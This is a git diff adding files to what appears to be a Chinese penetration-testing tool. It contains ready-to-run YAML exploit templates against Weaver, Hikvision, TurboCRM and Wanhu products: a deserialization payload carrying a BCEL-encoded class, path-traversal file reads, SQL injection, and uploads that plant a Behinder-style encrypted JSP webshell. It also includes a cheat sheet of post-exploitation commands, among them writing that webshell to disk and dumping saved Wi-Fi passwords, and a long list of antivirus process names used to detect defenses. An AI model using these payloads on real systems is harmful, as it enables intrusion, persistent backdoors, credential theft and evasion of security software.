diff --git a/poc/fanwei/WorkflowServiceXml.yml b/poc/fanwei/WorkflowServiceXml.yml new file mode 100644 index 0000000..bbd4096 --- /dev/null +++ b/poc/fanwei/WorkflowServiceXml.yml 
@@ -0,0 +1,30 @@ +method: POST +url: $ +tlsversion: HTTP/1.1 +uri: /services%20/WorkflowServiceXml +param: +data: ' + + + +<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class='javafx.collections.ObservableList$1'/> </default> <int>3</int> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <dataHandler> <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'> <contentType>text/plain</contentType> <is class='java.io.SequenceInputStream'> <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'> <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'> <names class='java.util.AbstractList$Itr'> <cursor>0</cursor> <lastRet>-1</lastRet> <expectedModCount>0</expectedModCount> <outer-class class='java.util.Arrays$ArrayList'> <a class='string-array'> <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$d9W$TW$i$fe$G$C3$M$c3b$Qa$5c$b1u$J$w$c1$ee$V$a9$VA$5c$g$d0$g$8a$Vm$ed0$5c$60$m$cc$c4$c9D$90$$v$b3$9b$ddwk$b7$97$k_$db$3eDO$7b$da$d3$87$be$d8S$l$da$3f$a8$f6$bb$93$40$J$89$da$9c$93$7b$e7$fe$eeo$bb$bf$ef$bb$bf$99$3f$fe$f9$e9W$A$f7$e3$5b$j$G$S$3a$G0$a8$e1$88$9c$8f$eax$i$c7$e4$90$d40$a4$e3$J$Mk8$ae$e2I$j$3aN$a8$Y$d1q$S$a7$a4$d9SR$f2$b4$86$d3r$7eF$87$85Q9$d8$g$c6T$I$N$e3$3a$9a1$a1aR$85$a3aJ$c5$b4$8e$Uft$ac$81$ab$c1$93sZ$Og$e4$e0k$c8$a8$It$dc$8d$ac$8a$b3$K$aa$bb$j$d7$J$f6$u$a8$8c$b5$P$x$88$f4zcBAC$c2q$c5$60vfT$f8C$d6h$8a$92h$c2$b3$ad$d4$b0$e5$3br$bd$m$M$ect$c6$b3$a7E$40$fd$e9$de$945$3f$af$60Eb$ca$3aku$a6$yw$a2$93$a2Lf7$V$tD$d0$9b$f5$7d$e1$G$c7$c4$99$ac$c8$E$D$KV$_Q$f4$c5xJ$d8A$e7$80$I$s$bd1Z$d4$dbE$ea2$81$ff$b4$8f$8cNQ$99Z$ca$b8$C$b3$8c$9b$7eG$a4$a4$X$cd$X$99$b4$e7f$98$ab$ce$U$8e$fbN$m$7c$86Vf$V4$e6$ed$i$af3$_$de$9d$d79$u$ac$b1P$a7$d2$9e$Z$x$O$9b$M$7c$c7$9d$90a3$K$9a$f2$h$d9$c0Iu$sm$cbuC$P$K$p5$_1$d9$3fg$8bt$e0x$$$f7$o$c1$a4C$c3$9a$c4x$d6$9e$3e$e7e$v$aaK$G$96$3d$3d$60$a5$c3$82$S$Q$S$40$c5$y$e1W1Gt$J$v$f1$q$60$cc$z$e9e$7
d$5b$f4$3b$b2$f0F$c1E$5cF2$b0$F$5bU$9c30$8fg$Z$868$d9$G$9e$c3$f3$w$5e0p$k$_$gx$J$_$x$d8j$7b3q$db$ca$da$93$5e$dc$V$c1$ac$e7O$c7SN$s$Qn$7c$c8N$t$XqT$f1$8a$81Wq$81P$96$c0Fj$yC$d7$c0kx$9d$d5$5c$8e$O$8fa$e0$N$bci$e0$z$5c4$f06$$$d2$f6$f4$C$k$fd$96$cd2$hx$H$ef$f2$a4$G$de$c3$fb$G$3e$c0$87$y$cf$oN$qA1B$KbioV$f8b$acm$f4$5c$5b$da$L$ac$m$e3$b5$95$fd$Z$f8$I$l$e7$9d$e5$B$z$ca0$P$a4$C5$efc$tOZ$C$a6$8aO$M$7c$8a$cfdu$3fWPq$aa$c7$c0$r$7ca$e02$be4$f0$V$beV$A$b2$a0$M$d4$G$be$c1V$3a$_$60$a4$a0$f5V$3cW$d0r$L$ee$$d$U$ee$i$cb$ba$813S$e0$f0$e2$a29$d6$9e$u$d1$914$Ts$c2$s$da$b1R$e6$$58$ea$7b$b6$I$_$e7$92$c2$MM$fa$ac$WyY$b8$7d$L$eb$95E$b1$f2RZ6K$7exn$m$e6$82$90$L$J$__j$b3H$7d$c9$96$b4$v$bbA$a8R$7c$I$r$K6$df$n$f7$85$b6$o$e1$5d$a8$e4$de26$tKl$dao$d7s$aa$j$f7$ac7$cd$d2$ee$8a$956$9b$93$a5$a2$f6r$zI$935$c9$l$a3$a9$b4$M$f2$ceS$n$99M$L$df$cek5r$dd$t$b8$m$af$L$d8w$dc$e1$fc$cb$db$5c$5dF$E$3d$b6$84$d3$J$fbr$q6$o$9by$r$3d$x$d8R$e60e3$af$9a$95$b7L$S$abL$f4$e1$oF$W$c8$c3$h$ca$Q$87$dct6$a0$9e$b0fH$e8$853$f3$d6$$$d9$a0$fb$d6X$d9$N$e9$d9$c8fD$9fH93$f9$5b$7e$h$ea$$k$b7$ea$a4$95$Z$q$fb$c2$d7$d7$I$P$ee$86$8bb$ba$$$b6$ed$864$l$82$b0$e5$O$f9$96$z$b0$R$9b$f9$82$95$3fvn$d9E9$c6$80$8avT$a3$96$d2$bf$b7$5d$85r$N$V$d1$ca$i$o$c7$af$a1$w$87$ea$a8$9a$83$96$d8$k$ad$a9$fc$Fz$O$b5$D$3b$U$3e$Z9$d4$Nv$e4P$9fCC$b41$87$V$5d$R3$S$c9$njF$um$ea$aa2i$5b$l$5dY0$ea$aa6$ab$cd$aa$82$ddoh$eeRM5$ba$w$87$W$e9$o$da$g$a1$d6$89$ca$a8$99$94$aa$9a$a9uP$60P$b0$3a$Z$aa$9b$5d5$3fc$cd$J$sf$d60$b1$i$d6$5e$c5$ba$e8$fa$i6t$e9$a6j2$40$db$r$d4$cay$e3$VTE$ef$a2$df$x2$e7$i6$fd$c0$TFp$j$7f$f2$D$a0$S$ed$3c$e3$m$9a8$g$94$d6$a3$O$N0$d1$88MX$818$a2$e8$e6$de$3e$ac$c4a$7ea$8c$60$V$a6$d0$823h$c5$Fj$5d$c2j$fc$c8$_$8a$ebXOokq$D$eb$f0$X6$60$h$bd$cd$d3$9f$89$ef$b1$j$3b$Yo$T$beC$H$fdU$f0$7f$Z$9d$d8$c9$c8$dd$ec$fc$f7$e0$5eF$3d$cc7$d4$7d$94U1$82$c7O$a58k$3f$85$d3x$A$PBe$a4$3e$3cD$99$c6x$3b$f10v$a1$86Q$5b$d0$85$dd$fc$g$baA$fbn$3c$c2$Y$c4$K$7b$f0$u$e7$bd$fc$3b$88$dc$c4$ef$a8U$d1$a3b$9f$8a$5e$V$7d$w$f6$87$p$9f$fb$c3$f1$80$8a$83P$b8$baI$fb$ff$a1Z$R$ae$O$dcd$a6$b4$ea$91$c3$a1
$IM$P3$60$F$k$fb$X$9f$s$83$aa$ec$J$A$A </string> </a> </outer-class> </names> <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'> <parent class='sun.misc.Launcher$ExtClassLoader'> </parent> <package2certs class='hashtable'/> <classes defined-in='java.lang.ClassLoader'/> <defaultDomain> <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/> <principals/> <hasAllPerm>false</hasAllPerm> <staticPermissions>false</staticPermissions> <key> </key> </defaultDomain> <domains class="java.util.Collections$SynchronizedSet" serialization="custom"> <java.util.Collections_-SynchronizedCollection> <default> <c class="set"></c> <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/> </default> </java.util.Collections_-SynchronizedCollection> </domains> <packages/> <nativeLibraries/> <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/> <defaultAssertionStatus>false</defaultAssertionStatus> <classes/> <ignored__packages> <string>java.</string> <string>javax.</string> <string>sun.</string> </ignored__packages> <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'> <__path> <paths/> <class__path>.</class__path> </__path> <__loadedClasses/> </repository> <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/> </processorCL> </iterator> <type>KEYS</type> </e> <in class='java.io.ByteArrayInputStream'> <buf></buf> <pos>0</pos> <mark>0</mark> <count>0</count> </in> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/> </java.util.PriorityQueue> </java.util.PriorityQueue> + 2 + + +' +others: + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' + Accept-Language: zh-CN,zh;q=0.9 + Cookie: ecology_JSessionid=aaaZq4kZ8A5s8a400gOHx; JSESSIONID=aaaZq4kZ8A5s8a400gOHx; __randcode__=5673423c-9aa3-4af0-afb1-340bb3538838 + Connection: close + potats0: ipconfig + Content-Type: text/xml;charset=UTF-8 + Content-Length: 36869 +condition: + words: powered by + time: +expinformation: + expname: 泛微命令执行 + expdescribe: 泛微/services%20/WorkflowServiceXml执行命令 diff --git a/poc/fanwei/fileread1.yml b/poc/fanwei/fileread1.yml new file mode 100644 index 0000000..179f590 --- /dev/null +++ b/poc/fanwei/fileread1.yml @@ -0,0 +1,20 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /weaver/org.springframework.web.servlet.ResourceServlet +param: resource=/WEB-INF/prop/weaver.properties +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: ecology.url + time: +expinformation: + expname: 泛微读取文件-1 + expdescribe: 泛微读取文件,/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties \ No newline at end of file diff --git a/poc/fanwei/fileread2.yml b/poc/fanwei/fileread2.yml new file mode 100644 index 0000000..52941be --- /dev/null +++ b/poc/fanwei/fileread2.yml 
@@ -0,0 +1,20 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /weaver/ln.FileDownload +param: fpath=../ecology/WEB-INF/prop/weaver.properties +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: ecology.url + time: +expinformation: + expname: 泛微读取文件-2 + expdescribe: 泛微读取文件,/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties \ No newline at end of file diff --git a/poc/fanwei/sqlinject1.yml b/poc/fanwei/sqlinject1.yml new file mode 100644 index 0000000..1c6d07f --- /dev/null +++ b/poc/fanwei/sqlinject1.yml 
@@ -0,0 +1,21 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /js/hrm/getdata.jsp +param: cmd=forgotPasswordCheck&type=1&loginid=sysadmin111111%27%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0aunion+select+ascii(1),%272%27,%273%27,%274%27,%275
%27,%276%27+where+%27%27=%27 +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: > + "id":49 + time: +expinformation: + expname: 泛微注入-2 + expdescribe: 泛微注入,/js/hrm/getdata.jsp \ No newline at end of file diff --git a/poc/hikvision/CVE-2017-7921.yml b/poc/hikvision/CVE-2017-7921.yml new file mode 100644 index 0000000..31245a6 --- /dev/null +++ b/poc/hikvision/CVE-2017-7921.yml @@ -0,0 +1,20 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /onvif-http/snapshot +param: auth=YWRtaW46MTEK +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Connection: keep-alive + Upgrade-Insecure-Requests: 1 +condition: + words: Content-Type:image/jpeg + time: +expinformation: + expname: hikvision + expdescribe: hikvision/CVE-2017-7921.yml,返回的为查看的图像(访问该链接可以直接查看海康威视的监控截图/onvif-http/snapshot?auth=YWRtaW46MTEK;访问该链接可以直接查看海康威视的用户列表/Security/users?auth=YWRtaW46MTEK;访问该链接可以直接获取海康威视的配置文件/System/configurationFile?auth=YWRtaW46MTEK) \ No newline at end of file diff --git a/poc/turbocrm/fileread.yml b/poc/turbocrm/fileread.yml new file mode 100644 index 0000000..e98940a --- /dev/null +++ b/poc/turbocrm/fileread.yml 
@@ -0,0 +1,19 @@ +method: GET +url: $ +tlsversion: HTTP/1.1 +uri: /ajax/getemaildata.php +param: DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts +data: | + +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q + Accept-Language: zh-CN,zh;q + Accept-Encoding: gzip, deflate + Upgrade-Insecure-Requests: 1 +condition: + words: Copyright + time: +expinformation: + expname: TurboCRM文件读取 + expdescribe: TurboCRM文件读取,路径为/ajax/getemaildata.php \ No newline at end of file diff --git a/poc/turbocrm/getshell.yml b/poc/turbocrm/getshell.yml new file mode 100644 index 0000000..32ea48a --- /dev/null +++ b/poc/turbocrm/getshell.yml @@ -0,0 +1,35 @@ +method: POST +url: $ +tlsversion: HTTP/1.1 +uri: /ajax/getemaildata.php +param: DontCheckLogin=1 +data: | + -----------------------------344329421119612311021814993770 + Content-Disposition: form-data; name="file"; filename="shell.php " + Content-Type: text/php + + + + -----------------------------344329421119612311021814993770 + Content-Disposition: form-data; name="upload" + + upload + -----------------------------344329421119612311021814993770-- +others: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' + Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' + Accept-Encoding: gzip, deflate + Content-Type: 'multipart/form-data; boundary=---------------------------344329421119612311021814993770' + Content-Length: 386 + Connection: keep-alive + Cookie: 'PHPSESSID=c7vlvgf1hhc8uat6r2nnu57333' + Upgrade-Insecure-Requests: 1 +condition: + words: tmpfile + time: +expinformation: + expname: TurboCRM任意文件上传 + expdescribe: TurboCRM任意文件上传,路径为返回的tmpfile/mh70D7.tmp.mht换为tmpfile/upd70D6.tmp.php \ No newline at end of file 
diff --git a/poc/wanhu/frontgetshell.yml b/poc/wanhu/frontgetshell.yml new file mode 100644 index 0000000..e50014e --- /dev/null +++ b/poc/wanhu/frontgetshell.yml @@ -0,0 +1,35 @@ +method: POST +url: $ +tlsversion: HTTP/1.1 +uri: /defaultroot/officeserverservlet +param: +data: | + DBSTEP V3.0 185 0 611 + DBSTEP=REJTVEVQ + OPTION=U0FWRUZJTEU= + RECORDID= + firstFilesize=dHJ1ZQ== + isDoc=dHJ1ZQ== + moduleType=aW5mb3JtYXRpb24= + FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3RhMi5qc3A= + isViewOld=MQ== + + <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> + <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%> + <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k); + Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES")); + new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> +others: + User-Agent: Go-http-client/1.1 + Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3' + Accept-Encoding: gzip, deflate + Accept-Language: 'zh-CN,zh;q=0.9,en;q=0.8' + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Length: 790 +condition: + words: DBSTEP + time: +expinformation: + expname: 万户getshell + expdescribe: 万户getshell,可能需要代理模式下进行使用,默认冰蝎马,密码为rebeyond \ No newline at end of file diff --git a/poc2jar.jar b/poc2jar.jar new file mode 100644 index 0000000..82435bf Binary files /dev/null and b/poc2jar.jar differ diff --git a/property/cmdlists.txt b/property/cmdlists.txt new file mode 100644 index 0000000..b86b6a9 --- /dev/null +++ b/property/cmdlists.txt 
@@ -0,0 +1,21 @@ +windows查找文件::::dir c:\ /s /b | find "win.ini"、dir c:\ /s /b | find "navicat.exe"、dir c:\ /s /b | find "finalshell.exe" + +linux查找文件::::find / -name passwd + +windows写文件::::echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp、、echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp、、echo ^<%if (request.getMethod().equals("POST")){String k="af8a6a25cc5bfb73";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp + +linux写文件::::echo xxxxx== |base64 -d > /var/www/html/1.jsp + +获取操作系统命令::::wmic OS get Caption,CSDVersion,OSArchitecture,Version + +主机收集::::查看rdp链接记录 cmdkey /list、查看dns记录 ipconfig /displaydns 、查看arp记录 arp -a + +根据进程查找进程文件::::wmic process where name="xxxx.exe" get processid,executablepath,name、wmic process where name="chrome.exe" list full + +查看当前系统是否有屏保保护,延迟是多少::::wmic desktop get screensaversecure,screensavertimeout + +查看当前系统是否是VMWARE::::wmic bios list full | find /i "vmware" + +显示系统中的曾经连接过的无线密码::::netsh wlan show profiles + +windows常用的系统变量::::查看当前用户目录%HOMEPATH、查看当前目录%CD%、列出用户共享主目录的网络路径%HOMESHARE%、 列出有效的当前登录会话的域名控制器名、列出了可执行文件的搜索路径%Path%、列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%、列出了Program Files文件夹的路径%ProgramFiles%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了包含用户帐号的域的名字%USERDOMAIN%、列出操作系统目录的位置%WINDIR%、返回“所有用户”配置文件的位置%ALLUSERSPROFILE%、返回处理器数目%NUMBER_OF_PROCESSORS% \ No newline at end of file diff --git a/property/config.properties b/property/config.properties new file mode 100644 index 0000000..0676474 --- /dev/null +++ b/property/config.properties @@ -0,0 +1 @@ +pythonpath=python \ No newline at end of file 
diff --git a/property/exetest.txt b/property/exetest.txt new file mode 100644 index 0000000..f821842 --- /dev/null +++ b/property/exetest.txt 
@@ -0,0 +1,530 @@ +"360tray.exe": "360安全卫士-实时保护", +"360safe.exe": "360安全卫士-主程序", +"ZhuDongFangYu.exe": "360安全卫士-主动防御", +"360sd.exe": "360杀毒", +"a2guard.exe": "a-squared杀毒", +"ad-watch.exe": "Lavasoft杀毒", +"cleaner8.exe": "The Cleaner杀毒", +"vba32lder.exe": "vb32杀毒", +"MongoosaGUI.exe": "Mongoosa杀毒", +"CorantiControlCenter32.exe": "Coranti2012杀毒", +"F-PROT.exe": "F-Prot AntiVirus", +"CMCTrayIcon.exe": "CMC杀毒", +"K7TSecurity.exe": "K7杀毒", +"UnThreat.exe": "UnThreat杀毒", +"CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒", +"AVWatchService.exe": "VIRUSfighter杀毒", +"ArcaTasksService.exe": "ArcaVir杀毒", +"iptray.exe": "Immunet杀毒", +"PSafeSysTray.exe": "PSafe杀毒", +"nspupsvc.exe": "nProtect杀毒", +"SpywareTerminatorShield.exe": "SpywareTerminator反间谍软件", +"BKavService.exe": "Bkav杀毒", +"MsMpEng.exe": "Microsoft Security Essentials", +"SBAMSvc.exe": "VIPRE", +"ccSvcHst.exe": "Norton杀毒", +"f-secure.exe": "冰岛", +"avp.exe": "Kaspersky", +"KvMonXP.exe": "江民杀毒", +"RavMonD.exe": "瑞星杀毒", +"Mcshield.exe": "McAfee", +"Tbmon.exe": "McAfee", +"Frameworkservice.exe": "McAfee", +"egui.exe": "ESET NOD32", +"ekrn.exe": "ESET NOD32", +"eguiProxy.exe": "ESET NOD32", +"kxetray.exe": "金山毒霸", +"knsdtray.exe": "可牛杀毒", +"TMBMSRV.exe": "趋势杀毒", +"avcenter.exe": "Avira(小红伞)", +"avguard.exe": "Avira(小红伞)", +"avgnt.exe": "Avira(小红伞)", +"sched.exe": "Avira(小红伞)", +"ashDisp.exe": "Avast网络安全", +"rtvscan.exe": "诺顿杀毒", +"ccapp.exe": "SymantecNorton", +"NPFMntor.exe": "Norton杀毒软件", +"ccSetMgr.exe": "赛门铁克", +"ccRegVfy.exe": "Norton杀毒软件", +"ksafe.exe": "金山卫士", +"QQPCRTP.exe": "QQ电脑管家", +"avgwdsvc.exe": "AVG杀毒", +"QUHLPSVC.exe": "QUICK HEAL杀毒", +"mssecess.exe": "微软杀毒", +"SavProgress.exe": "Sophos杀毒", +"SophosUI.exe": "Sophos杀毒", +"SophosFS.exe": "Sophos杀毒", +"SophosHealth.exe": "Sophos杀毒", +"SophosSafestore64.exe": "Sophos杀毒", +"SophosCleanM.exe": "Sophos杀毒", +"fsavgui.exe": "F-Secure杀毒", +"vsserv.exe": "比特梵德", +"remupd.exe": "熊猫卫士", +"FortiTray.exe": "飞塔", +"safedog.exe": "安全狗", +"parmor.exe": "木马克星", 
+"Iparmor.exe.exe": "木马克星", +"beikesan.exe": "贝壳云安全", +"KSWebShield.exe": "金山网盾", +"TrojanHunter.exe": "木马猎手", +"GG.exe": "巨盾网游安全盾", +"adam.exe": "绿鹰安全精灵", +"AST.exe": "超级巡警", +"ananwidget.exe": "墨者安全专家", +"AVK.exe": "AntiVirusKit", +"avg.exe": "AVG Anti-Virus", +"spidernt.exe": "Dr.web", +"avgaurd.exe": "Avira Antivir", +"vsmon.exe": "Zone Alarm", +"cpf.exe": "Comodo", +"outpost.exe": "Outpost Firewall", +"rfwmain.exe": "瑞星防火墙", +"kpfwtray.exe": "金山网镖", +"FYFireWall.exe": "风云防火墙", +"MPMon.exe": "微点主动防御", +"pfw.exe": "天网防火墙", +"BaiduSdSvc.exe": "百度杀毒-服务进程", +"BaiduSdTray.exe": "百度杀毒-托盘进程", +"BaiduSd.exe": "百度杀毒-主程序", +"SafeDogGuardCenter.exe": "安全狗", +"safedogupdatecenter.exe": "安全狗", +"safedogguardcenter.exe": "安全狗", +"SafeDogSiteIIS.exe": "安全狗", +"SafeDogTray.exe": "安全狗", +"SafeDogServerUI.exe": "安全狗", +"D_Safe_Manage.exe": "D盾", +"d_manage.exe": "D盾", +"yunsuo_agent_service.exe": "云锁", +"yunsuo_agent_daemon.exe": "云锁", +"HwsPanel.exe": "护卫神", +"hws_ui.exe": "护卫神", +"hws.exe": "护卫神", +"hwsd.exe": "护卫神", +"hipstray.exe": "火绒", +"wsctrl.exe": "火绒", +"usysdiag.exe": "火绒", +"SPHINX.exe": "SPHINX防火墙", +"bddownloader.exe": "百度卫士", +"baiduansvx.exe": "百度卫士-主进程", +"AvastUI.exe": "Avast!5主程序", +"emet_agent.exe": "EMET", +"emet_service.exe": "EMET", +"firesvc.exe": "McAfee", +"firetray.exe": "McAfee", +"hipsvc.exe": "McAfee", +"mfevtps.exe": "McAfee", +"mcafeefire.exe": "McAfee", +"scan32.exe": "McAfee", +"shstat.exe": "McAfee", +"vstskmgr.exe": "McAfee", +"engineserver.exe": "McAfee", +"mfeann.exe": "McAfee", +"mcscript.exe": "McAfee", +"updaterui.exe": "McAfee", +"udaterui.exe": "McAfee", +"naprdmgr.exe": "McAfee", +"cleanup.exe": "McAfee", +"cmdagent.exe": "McAfee", +"frminst.exe": "McAfee", +"mcscript_inuse.exe": "McAfee", +"mctray.exe": "McAfee", +"_avp32.exe": "卡巴斯基", +"_avpcc.exe": "卡巴斯基", +"_avpm.exe": "卡巴斯基", +"aAvgApi.exe": "AVG", +"ackwin32.exe": "已知杀软进程,名称暂未收录", +"alertsvc.exe": "Norton AntiVirus", +"alogserv.exe": "McAfee VirusScan", +"anti-trojan.exe": 
